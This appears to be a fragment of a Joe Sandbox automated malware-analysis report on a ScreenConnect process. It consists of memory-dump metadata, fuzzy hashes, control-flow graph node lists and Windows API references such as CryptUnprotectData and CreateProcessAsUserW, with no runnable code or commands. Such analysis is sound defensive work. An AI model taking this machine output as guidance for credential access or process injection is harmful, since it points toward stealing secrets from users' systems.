• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
• Opcode ID: 1b98d0dd9cc6f2345a12d319db2bcf6903d8953a1dff7e81b81e307fb62395ae
• Instruction ID: de9261be9005e04daa7b30ceb843470b12bff896ef14deb1f168729323a25e3a
• Opcode Fuzzy Hash: 1b98d0dd9cc6f2345a12d319db2bcf6903d8953a1dff7e81b81e307fb62395ae
• Instruction Fuzzy Hash: E82144B6800249DFCF10CF99C804AEEBBF5EF48320F108419E914A7250C379A551CFA4
APIs
• CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 0521300D
Memory Dump Source
• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID: CryptDataUnprotect
• String ID:
• API String ID: 834300711-0
• Opcode ID: a25f92980159a47163da87c525fed03f689bfbdd2747fc89b1a0ebd1a30f3f07
• Instruction ID: ae2ecc058ccfa8b46a1c209ec1f81955c8e3c519f1587faf6c1a5e55fb4dabd4
• Opcode Fuzzy Hash: a25f92980159a47163da87c525fed03f689bfbdd2747fc89b1a0ebd1a30f3f07
• Instruction Fuzzy Hash: 4B2153B280020A9FCF10CF99C844BEEBFF5EF48320F148419E918A7210C339A595CFA4
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9ce992a1fd756fd8c69ed1865b181a1fef8eaff881708a8ef793d7c8cad1d3e6
• Instruction ID: e50fc3ba61ee286473bbfb9a0e14e666a0d07a67dae025e5e76ec01ae8ebd7cd
• Opcode Fuzzy Hash: 9ce992a1fd756fd8c69ed1865b181a1fef8eaff881708a8ef793d7c8cad1d3e6
• Instruction Fuzzy Hash: 5D324C34A402199FDB54DF68D994A9DBBF2FF88304F1085A9E50AAB355DB70ED81CF80

Control-flow Graph

control_flow_graph 154 522f696-522f69d 155 522f69f-522f6bb 154->155 156 522f6bd-522f6fc 154->156 155->156 157 522f750-522f7d3 CreateFileA 156->157 158 522f6fe-522f723 156->158 165 522f7d5-522f7db 157->165 166 522f7dc-522f81a 157->166 158->157 161 522f725-522f727 158->161 163 522f74a-522f74d 161->163 164 522f729-522f733 161->164 163->157 167 522f737-522f746 164->167 168 522f735 164->168 165->166 173 522f82a 166->173 174 522f81c-522f820 166->174 167->167 169 522f748 167->169 168->167 169->163 176 522f82b 173->176 174->173 175 522f822 174->175 175->173 176->176
APIs
• CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 0522F7BD
Strings
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: CreateFile
• String ID: 4L^q
• API String ID: 823142352-616035646
• Opcode ID: 2ec95cd999efded5f3c562c4ba49f341348ffc50ee793609e47b84c75f2d2a08
• Instruction ID: f40e220f5b47c53b18006b38b3e4785dc74a192bdd4b95981f3db996591d1daf
• Opcode Fuzzy Hash: 2ec95cd999efded5f3c562c4ba49f341348ffc50ee793609e47b84c75f2d2a08
• Instruction Fuzzy Hash: 215188B5D10259AFDB10CFA9CA85B9EBBF2FF08300F248129E809AB351D7759845CF81

Control-flow Graph

control_flow_graph 177 522f6a0-522f6fc 178 522f750-522f7d3 CreateFileA 177->178 179 522f6fe-522f723 177->179 186 522f7d5-522f7db 178->186 187 522f7dc-522f81a 178->187 179->178 182 522f725-522f727 179->182 184 522f74a-522f74d 182->184 185 522f729-522f733 182->185 184->178 188 522f737-522f746 185->188 189 522f735 185->189 186->187 194 522f82a 187->194 195 522f81c-522f820 187->195 188->188 190 522f748 188->190 189->188 190->184 197 522f82b 194->197 195->194 196 522f822 195->196 196->194 197->197
APIs
• CreateFileA.KERNEL32(?,?,?,?,?,00000001,00000004), ref: 0522F7BD
Strings
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: CreateFile
• String ID: 4L^q
• API String ID: 823142352-616035646
• Opcode ID: daefd029d773af43e48bfb32158bb06befbd1b65945c93087a7a8e9e127b85d5
• Instruction ID: 54b4f4ca92d5e558910c43b4d97e82000ad57bb7a705a4d48fddc1c1f0c565dd
• Opcode Fuzzy Hash: daefd029d773af43e48bfb32158bb06befbd1b65945c93087a7a8e9e127b85d5
• Instruction Fuzzy Hash: EE4177B5D10259AFDB10CFA9CA45B9EBBF2FF48304F248129E808AB351D7B59845CF81

Control-flow Graph

control_flow_graph 479 52162e8-52162fd 480 5216312-5216319 479->480 481 52162ff-5216302 479->481 484 521631e-5216362 call 5215594 480->484 482 5216308-5216311 481->482 483 52163cc-52163e0 481->483 485 52163e2 483->485 486 52163a6-52163af 483->486 503 5216367-521636c 484->503 490 52163ee-52163f7 485->490 488 52163b1-52163cb 486->488 489 521640c-521646e 486->489 494 5216470-5216478 489->494 495 521647a-52164b0 K32EnumProcesses 489->495 494->495 497 52164b2-52164b8 495->497 498 52164b9-52164e1 495->498 497->498 504 5216372-5216375 503->504 505 52163f8-5216405 503->505 506 52163e4-52163e9 504->506 507 5216377-52163a4 504->507 505->489 506->484 507->486 507->490
Memory Dump Source
• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2e05e494c9b9ef7e191874319e867317809954d3d937dfdc48bc902766c25d9c
• Instruction ID: 28886f3bdaa51dc2ff371f9302023e2b6a442fdb60aeb6c1431cfde9c75a4ca3
• Opcode Fuzzy Hash: 2e05e494c9b9ef7e191874319e867317809954d3d937dfdc48bc902766c25d9c
• Instruction Fuzzy Hash: 13518C71A006058FCB24CFA9D884AAFBBF5FF88310F10892ED45AD7A51D734E9458BA5

Control-flow Graph

control_flow_graph 512 5222928-5222981 514 5222983-5222989 512->514 515 522298c-5222990 512->515 514->515 516 5222992-5222995 515->516 517 5222998-52229ad 515->517 516->517 518 52229bb-5222a12 CreateProcessAsUserW 517->518 519 52229af-52229b8 517->519 520 5222a14-5222a1a 518->520 521 5222a1b-5222a43 518->521 519->518 520->521
APIs
• CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 052229FF
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: CreateProcessUser
• String ID:
• API String ID: 2217836671-0
• Opcode ID: 34c32df232b55f49f2bba55e43fc26e4855aab913d10ac7be86b901552334622
• Instruction ID: 59091a945375d1f358529fa4c6fb3a3dceae6dbcb2b3e6319c09c7cb5b10287b
• Opcode Fuzzy Hash: 34c32df232b55f49f2bba55e43fc26e4855aab913d10ac7be86b901552334622
• Instruction Fuzzy Hash: 6441247690025AEFCB10CFA9C884ADEBBF1FF48310F14842AE958A7250D775AA55CF90
APIs
• ConnectNamedPipe.KERNEL32(00000000), ref: 05221558
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConnectNamedPipe
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2191148154-0
                                                                                                                                                                      • Opcode ID: 4e51904564f442cac0bad3090664511601a89dc6f6c3f3615e40ddd7a52d47ac
                                                                                                                                                                      • Instruction ID: 39b9f128194c6f992e7aeeeaaaaffff1c0f02777030184f37614e24c161a6994
                                                                                                                                                                      • Opcode Fuzzy Hash: 4e51904564f442cac0bad3090664511601a89dc6f6c3f3615e40ddd7a52d47ac
                                                                                                                                                                      • Instruction Fuzzy Hash: 692124B5D10268AFCB24CFA9D584BDEBBF0AF48310F148069E859AB350DB749956CF90
Control-flow graph (rendered graph not captured; executed/not-executed marking lost): 4 basic blocks spanning 52164f0-52165c2; ProcessIdToSessionId is called from block 5216520-5216591.
APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0521657E
Memory Dump Source
• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0
• Opcode ID: e224754b3bb1e9d01beb4063d6b6cf97a8974d371b3db8ea4b4c31eae1888584
• Instruction ID: dc8a8eed12692888fbfc78c178a3fe1b533296aebe09d7791ac109550e535675
• Opcode Fuzzy Hash: e224754b3bb1e9d01beb4063d6b6cf97a8974d371b3db8ea4b4c31eae1888584
• Instruction Fuzzy Hash: 9B2152B28002499FCB10CF9AC885BDEBBF4FF49324F15806AD858A7651D338A945CFA5

APIs
• ConnectNamedPipe.KERNEL32(00000000), ref: 05221558
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: ConnectNamedPipe
• String ID:
• API String ID: 2191148154-0
• Opcode ID: 5839c76949ad946369ab64a6ba73e3fa67bd49399f303e9f15554964c2537f7b
• Instruction ID: d94d5488095a9ff3f7ce2cbd214ca6e835c6f75e06dd5bf7f018aa5c4c470528
• Opcode Fuzzy Hash: 5839c76949ad946369ab64a6ba73e3fa67bd49399f303e9f15554964c2537f7b
• Instruction Fuzzy Hash: 862117B4D102589FCB24CF99C584BDEBBF5AF48300F148059E849A7350CB749945CF94

APIs
• K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 0521649D
Memory Dump Source
• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID: EnumProcesses
• String ID:
• API String ID: 84517404-0
• Opcode ID: d50feacc9bf21c0bdc61691947479c1072e1e7fdcb859578e7f3ac492fc56ec1
• Instruction ID: eef8dbd8927c4a7ad6319e0cdfc0b542a0536c35d7fceb997717f22c53d55b8f
• Opcode Fuzzy Hash: d50feacc9bf21c0bdc61691947479c1072e1e7fdcb859578e7f3ac492fc56ec1
• Instruction Fuzzy Hash: A42128B59002199FDB20CF99C844BEEFBF4FF48310F10842DE959A7240C379A945CBA4

APIs
• WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05224EA6), ref: 05224F4F
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: NamedPipeWait
• String ID:
• API String ID: 3146367894-0
• Opcode ID: a8cb13b072504cd4b74c6ee01c33c6783b19a8581feca51a84011c5087be98e3
• Instruction ID: d099e60d6a8194e2537a028c4500407518c99b267c30a31276a923a67c45b1cb
• Opcode Fuzzy Hash: a8cb13b072504cd4b74c6ee01c33c6783b19a8581feca51a84011c5087be98e3
• Instruction Fuzzy Hash: 532135B68142599FCB10CF9AC444AEEBBF4EB88314F11842ED469A7240C779A545CFA1

APIs
• WaitNamedPipeW.KERNEL32(00000000,0000000A,?,?,?,?,?,?,?,05224EA6), ref: 05224F4F
Memory Dump Source
• Source File: 00000007.00000002.3601950400.0000000005220000.00000040.00000800.00020000.00000000.sdmp, Offset: 05220000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5220000_ScreenConnect.jbxd
Similarity
• API ID: NamedPipeWait
• String ID:
• API String ID: 3146367894-0
• Opcode ID: 1e7bd42d6687253dd83b8958644ffa7c44988a93ee130a8e1e4548f3d9391797
• Instruction ID: 4b27d8f36d31771ca29a677b95b30f70344870d6ea91c7fa8ea4dcf1a359a095
• Opcode Fuzzy Hash: 1e7bd42d6687253dd83b8958644ffa7c44988a93ee130a8e1e4548f3d9391797
• Instruction Fuzzy Hash: 9F2135B68143599FCB10DF9AC444AEEBBF4EF88324F10842EE469A7201C379A545CFA0

APIs
• ProcessIdToSessionId.KERNEL32(00000000,?), ref: 0521657E
Memory Dump Source
• Source File: 00000007.00000002.3601775033.0000000005210000.00000040.00000800.00020000.00000000.sdmp, Offset: 05210000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_5210000_ScreenConnect.jbxd
Similarity
• API ID: ProcessSession
• String ID:
• API String ID: 3779259828-0
• Opcode ID: aa3da5983441353f29e19d9af0186120d7ec6b4b06073996741998114a491d2a
• Instruction ID: fe1e32cc1579ab6b05d271621820e09b2eabb42b3aa75d816df4e7b20b449063
• Opcode Fuzzy Hash: aa3da5983441353f29e19d9af0186120d7ec6b4b06073996741998114a491d2a
• Instruction Fuzzy Hash: 9A1100B18103499FCB20CF9AC444BEEBBF4FB48324F10846AE859A7650D379A945CFA5

Memory Dump Source
• Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 76d2d360ad32e0cbf0051c41b9d4581221c088c4b7b005b2a3f86c47e6237ab6
• Instruction ID: e937048dda6fc01232d6ac17fffd0fbf4f4be9341c3a5822457424661754f3f1
• Opcode Fuzzy Hash: 76d2d360ad32e0cbf0051c41b9d4581221c088c4b7b005b2a3f86c47e6237ab6
• Instruction Fuzzy Hash: 312122B2544240DFCB05DF14D9C0B2BBF75FB98320F20C5AAE80A0B356C336D856CAA1

Memory Dump Source
• Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction ID: e5b419e13e207e77600cae9e020e8daeca29628742b1965174a9db5fb00686db
• Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
• Instruction Fuzzy Hash: 0F11D376504280CFCB16CF10D9C4B16BF72FB98324F24C6AAD8090B756C336D85ACBA1

Memory Dump Source
• Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6db90e9342d936add7677834a16b04f553401bef964d800028ad41c8ddaf67c8
• Instruction ID: 35a4624c9dccb7333f59ea093902d07495d18b5a04c624dbd608d753f9b8a42b
• Opcode Fuzzy Hash: 6db90e9342d936add7677834a16b04f553401bef964d800028ad41c8ddaf67c8
• Instruction Fuzzy Hash: 4901A271408340AAE7109B29CD84B67BFA8EF85324F18C52BED5B5A386C279D845C6B1

Memory Dump Source
• Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d30b2be454879309ceb704bb0040dabfd6a4beb2eeee9163ae6ee0537ace116e
• Instruction ID: 0f8f82626652a95f3a61db20b797a310fc136945b5dbb18ed387e90b2c9fed28
• Opcode Fuzzy Hash: d30b2be454879309ceb704bb0040dabfd6a4beb2eeee9163ae6ee0537ace116e
• Instruction Fuzzy Hash: 2A015E7100E3C09ED7128B258C94B52BFB4EF53224F19C1DBD8898F2A3C2699849C7B2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:5
                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                      execution_graph 18523 7ffd9b2f8014 18525 7ffd9b2f801d 18523->18525 18524 7ffd9b2f8082 18525->18524 18526 7ffd9b2f80f6 SetProcessMitigationPolicy 18525->18526 18527 7ffd9b2f8152 18526->18527

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 164 7ffd9b606ad6-7ffd9b606b04 call 7ffd9b600c40 * 2 170 7ffd9b606b0a-7ffd9b606b18 164->170 171 7ffd9b60789e-7ffd9b6078b1 164->171 173 7ffd9b606b1a-7ffd9b606b1c 170->173 174 7ffd9b606b1e-7ffd9b606b2d call 7ffd9b604930 170->174 176 7ffd9b606b30-7ffd9b606b32 173->176 174->176 178 7ffd9b606b38-7ffd9b606b54 176->178 179 7ffd9b606c72-7ffd9b606c75 176->179 178->179 198 7ffd9b606b5a-7ffd9b606b6c 178->198 180 7ffd9b606c7b-7ffd9b606c83 179->180 181 7ffd9b606db0-7ffd9b606db7 179->181 182 7ffd9b606c84-7ffd9b606c86 180->182 184 7ffd9b606e47-7ffd9b606e4e 181->184 185 7ffd9b606dbd-7ffd9b606dc4 181->185 186 7ffd9b606c88-7ffd9b606cb0 182->186 187 7ffd9b606cd2-7ffd9b606ce0 182->187 188 7ffd9b606e59-7ffd9b606e6c 184->188 189 7ffd9b606e50-7ffd9b606e57 184->189 185->184 190 7ffd9b606dca-7ffd9b606dd4 185->190 186->182 212 7ffd9b606cb2-7ffd9b606cd0 186->212 187->181 206 7ffd9b606e6e-7ffd9b606e73 188->206 207 7ffd9b606e7d-7ffd9b606e85 188->207 189->188 193 7ffd9b606e96-7ffd9b606e9d 189->193 190->193 200 7ffd9b606dda-7ffd9b606e23 190->200 196 7ffd9b606ea3-7ffd9b606eaa 193->196 197 7ffd9b607101-7ffd9b607108 193->197 196->197 201 7ffd9b606eb0-7ffd9b606eb3 196->201 197->171 203 7ffd9b60710e-7ffd9b607115 197->203 204 7ffd9b606bba-7ffd9b606c45 198->204 205 7ffd9b606b6e-7ffd9b606b8b 198->205 210 7ffd9b606ebc-7ffd9b606eca 201->210 211 7ffd9b606eb5-7ffd9b606eb7 201->211 203->171 213 7ffd9b60711b-7ffd9b60712d 203->213 264 7ffd9b606c48-7ffd9b606c66 204->264 222 7ffd9b6078b2-7ffd9b6078cc 205->222 223 7ffd9b606b91-7ffd9b606bb8 205->223 206->207 215 7ffd9b606e8b-7ffd9b606e8f 207->215 216 7ffd9b6078f1-7ffd9b607922 207->216 234 7ffd9b606ecc 210->234 235 7ffd9b606ece 210->235 218 7ffd9b606f6a-7ffd9b606f6d 211->218 212->187 220 7ffd9b607179-7ffd9b607191 213->220 221 7ffd9b60712f-7ffd9b60714c 213->221 215->193 227 7ffd9b606f76-7ffd9b606f84 218->227 228 7ffd9b606f6f-7ffd9b606f71 218->228 238 7ffd9b607152-7ffd9b607177 221->238 239 7ffd9b6078df-7ffd9b6078f0 221->239 284 7ffd9b6078cd-7ffd9b6078d5 222->284 223->204 257 7ffd9b606f88 227->257 258 7ffd9b606f86 227->258 237 7ffd9b607025-7ffd9b60702b 228->237 246 7ffd9b606ed0-7ffd9b606ed3 234->246 235->246 242 7ffd9b607031-7ffd9b607033 237->242 243 7ffd9b6070dd-7ffd9b6070df 237->243 238->220 239->216 242->243 249 7ffd9b607039-7ffd9b60705b 242->249 243->197 250 7ffd9b6070e1-7ffd9b6070e9 243->250 254 7ffd9b606ed5-7ffd9b606edb 246->254 255 7ffd9b606edd-7ffd9b606ee8 246->255 292 7ffd9b60705f-7ffd9b607090 249->292 250->197 262 7ffd9b6070eb-7ffd9b6070fd 250->262 266 7ffd9b606f58-7ffd9b606f63 254->266 267 7ffd9b606eea-7ffd9b606f07 255->267 268 7ffd9b606f34-7ffd9b606f55 255->268 259 7ffd9b606f8a-7ffd9b606f8d 257->259 258->259 270 7ffd9b606f97-7ffd9b606fa2 259->270 271 7ffd9b606f8f-7ffd9b607023 259->271 262->197 287 7ffd9b606c68-7ffd9b606c70 264->287 288 7ffd9b606c67 264->288 274 7ffd9b606f66-7ffd9b606f68 266->274 267->284 285 7ffd9b606f0d-7ffd9b606f32 267->285 268->266 278 7ffd9b606fa4-7ffd9b606faf 270->278 279 7ffd9b606fee-7ffd9b606ffe 270->279 271->237 274->218 278->274 291 7ffd9b606fb1-7ffd9b606fc1 278->291 296 7ffd9b6078d6-7ffd9b6078de 284->296 285->268 287->179 287->264 288->287 295 7ffd9b606fc7-7ffd9b606fec 291->295 291->296 305 7ffd9b607092-7ffd9b6070db 292->305 295->279 296->239 305->197
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: E
                                                                                                                                                                      • API String ID: 0-3568589458
                                                                                                                                                                      • Opcode ID: 748c7fbb6488babcfcd715866cda8e75f1644f0954ff2270d4cc2ecf0efc25ee
                                                                                                                                                                      • Instruction ID: 74e8a41df24b9a48fc8d74628094cc6d1fd97b1f39a8399f697d8e1b10890dd9
                                                                                                                                                                      • Opcode Fuzzy Hash: 748c7fbb6488babcfcd715866cda8e75f1644f0954ff2270d4cc2ecf0efc25ee
                                                                                                                                                                      • Instruction Fuzzy Hash: F9126861B0EA4E4FE7759A6A44702B47BD2EF56344F0A01BED4EDCB1E7DD28B9028341
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dbfeffee08e23db8856d7bab6c020c417957dc5d5de72a700447138a7d5ec65f
                                                                                                                                                                      • Instruction ID: 2cae9e8bd8bf5650736dda963dbfc8208b58de1c967e8d3148e38d9fa9cddcd8
                                                                                                                                                                      • Opcode Fuzzy Hash: dbfeffee08e23db8856d7bab6c020c417957dc5d5de72a700447138a7d5ec65f
                                                                                                                                                                      • Instruction Fuzzy Hash: CAE24C30A0961D8FDBA8DB69C8A4BA8B7F1FF59300F1541F9D45DD72A1DA34AE81CB40

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1437 7ffd9b607193-7ffd9b60719e 1438 7ffd9b6071a4-7ffd9b6071bc 1437->1438 1439 7ffd9b607241-7ffd9b607247 1437->1439 1438->1439 1445 7ffd9b6071c2-7ffd9b6071c3 1438->1445 1440 7ffd9b60789e-7ffd9b6078b1 1439->1440 1441 7ffd9b60724d-7ffd9b607255 1439->1441 1443 7ffd9b607257-7ffd9b607260 1441->1443 1444 7ffd9b60729d-7ffd9b6072a5 1441->1444 1449 7ffd9b60726a-7ffd9b607296 1443->1449 1444->1440 1447 7ffd9b6072ab-7ffd9b6072b6 1444->1447 1448 7ffd9b6071c6-7ffd9b60722c 1445->1448 1447->1449 1453 7ffd9b6072b8-7ffd9b60746c 1447->1453 1465 7ffd9b607239-7ffd9b60723f 1448->1465 1466 7ffd9b60722e-7ffd9b607234 call 7ffd9b606308 1448->1466 1449->1444 1491 7ffd9b607473-7ffd9b60750a 1453->1491 1465->1439 1465->1448 1466->1465 1495 7ffd9b60750c-7ffd9b60750e 1491->1495 1496 7ffd9b607510-7ffd9b607511 1491->1496 1497 7ffd9b607518-7ffd9b607525 1495->1497 1496->1497 1498 7ffd9b60755b 1497->1498 1499 7ffd9b607527-7ffd9b60753f 1497->1499 1500 7ffd9b60755f-7ffd9b607562 1498->1500 1507 7ffd9b607541-7ffd9b607556 1499->1507 1508 7ffd9b60755d 1499->1508 1501 7ffd9b607575-7ffd9b607578 1500->1501 1502 7ffd9b607564-7ffd9b607571 1500->1502 1505 7ffd9b60757a-7ffd9b60757b 1501->1505 1506 7ffd9b607582-7ffd9b6075ab 1501->1506 1502->1501 1509 7ffd9b607573 1502->1509 1505->1506 1514 7ffd9b6075b2-7ffd9b607649 1506->1514 1507->1491 1508->1500 1509->1501 1518 7ffd9b60764b-7ffd9b60764d 1514->1518 1519 7ffd9b60764f-7ffd9b607650 1514->1519 1520 7ffd9b607657-7ffd9b607664 1518->1520 1519->1520 1521 7ffd9b60769a 1520->1521 1522 7ffd9b607666-7ffd9b60767e 1520->1522 1523 7ffd9b60769e-7ffd9b6076a1 1521->1523 1530 7ffd9b60769c 1522->1530 1531 7ffd9b607680-7ffd9b607695 1522->1531 1524 7ffd9b6076b4-7ffd9b6076b7 1523->1524 1525 7ffd9b6076a3-7ffd9b6076b0 1523->1525 1528 7ffd9b6076b9-7ffd9b6076ba 1524->1528 1529 7ffd9b6076c1-7ffd9b60771f call 7ffd9b606118 1524->1529 1525->1524 1532 7ffd9b6076b2 1525->1532 1528->1529 1539 7ffd9b607721-7ffd9b607724 1529->1539 1540 7ffd9b607790-7ffd9b6077a2 1529->1540 1530->1523 1531->1514 1532->1524 1542 7ffd9b607726-7ffd9b60777f call 7ffd9b606318 call 7ffd9b606328 call 7ffd9b606128 1539->1542 1543 7ffd9b6077a5-7ffd9b6077ac 1539->1543 1540->1543 1554 7ffd9b607780-7ffd9b60778d 1542->1554 1544 7ffd9b6078e8-7ffd9b607922 1543->1544 1545 7ffd9b6077ad-7ffd9b6077b7 1543->1545 1553 7ffd9b6077b9-7ffd9b6077d7 1545->1553 1545->1554 1557 7ffd9b6077d9-7ffd9b6077e7 1553->1557 1554->1557 1558 7ffd9b60778f 1554->1558 1557->1440 1558->1540
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a2dbb72ded7dd60f3d96e6185e63f06efc7663dc746ec1dae0ba281deeed2198
                                                                                                                                                                      • Instruction ID: 9e9a2e760a06026e6563d3380dd751758ff01c85445e7bdfc13f0338c972a038
                                                                                                                                                                      • Opcode Fuzzy Hash: a2dbb72ded7dd60f3d96e6185e63f06efc7663dc746ec1dae0ba281deeed2198
                                                                                                                                                                      • Instruction Fuzzy Hash: F2222671B0DA4A4FEBA8EF298465A7577D1FFA5340F0400BED09ECB2A6DE24B841C741

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
